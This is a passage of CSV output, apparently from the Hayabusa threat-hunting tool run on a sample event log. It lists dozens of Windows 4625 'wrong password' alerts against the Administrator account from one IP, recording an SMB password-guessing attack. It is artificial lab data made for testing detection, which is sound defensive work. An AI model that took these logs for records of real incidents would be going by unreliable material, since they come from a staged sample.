NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WASvcAp9zfU3uSka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H1f6szOactEp5ntF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Loe5RkT9Ki0Aw2Lv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJdVtE7dNSoyM3LI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlAtU1mIO7m5DnuP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wAK2rh94yKwiH2Nw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuqsvmUbPlpWFBRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BShEB6VnXkOxwtFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AjAc5QMvpTBsDziO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fwwp5CD20dR8QrIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tL6GzVzndZL7DZMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zK5IpESvDA2DexwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvTyabCyGaxscOrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW8VghddPwP5C6dO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGZuyZ0LErZ3Sgty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bT1xrvfndr5R8Vg3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H6RFTZVJE9remzqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzjwzORvTwuBPLEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMjSFfZ88BV2sT1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SnpCLI2EJZRhr3vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztEU2m9SwbqgSdVY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHO1X0zwmoWotcM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ck429g2Cs4siVVq4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9txH9zA3oY885iTi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: alIIEzE2rTrNtOtr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ww4BXLwhaNxOttgo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GPdz2pjDocMWqctT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOm1i2a20IDNmIu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ukSrSu516dHlHQ94 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: grdERCipFl1FMB1o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmpuUsIRbp57KCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VWLuqrOQSQuqcwUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eEASOf84AX8ow4vf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcgNTGlESh6FytEY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeVo7D3oBsdUMHfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mLqSB2yGMksaBgUS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7qRzzpL2YhfIGSD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvE5tMw3MjDhA0Fe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXuNgOkIzvKIuJki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q8vPHEXrxVpUyKZq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vk7sh6VM7AZQv2in : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jurt5hAg90y1VWdT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlrPbTbJRTxFakiv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ5cWmYL8weCCRT0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0v2Emgn7BD1STZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MJppWxAiNJ4D0s2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHVcJEec3y6v9gIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 68RKE5dS8X5Px2gR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Np8mTqhr7QasXk1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhpDNDIPVyRlfej8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZtmxGeLj25VSUcm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SPN8w8WghBYzChZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 36hmbCuKxF9Dt4vR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TALpRirdvB9a8y6M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvEvwFeXGOgycZvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ppxeOgZNua2Ieuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n4U5XdQu1YtSat7J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MN0OfYE6vPgqyyZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmfCPIdiTH9gG2qZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UtcHAxmfDL9C9uZa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TX62kMSJqq0Lv8o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hA20OdabfW5DMphV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ex5Awm2zaVhvAMTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I72BOMPQHyyP374g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4al5pUa4mKfbL734 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UNHH8ESWZ4Rx6K93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ay3XdxRFXXaD4Ib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PgyG7spUL5glkVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6D6PVnrIODwtcIXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cRZgqmQbL3l7KTke : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HYGKv2l0s9XZnqkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wX2R08dxiEcRNzcM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcN791fdSHwaWuBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CRObbkQsykQma2Tn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v4UvU7VglbA2p0Z9 : IP Address: 192.168.198.149 : AuthPackage: 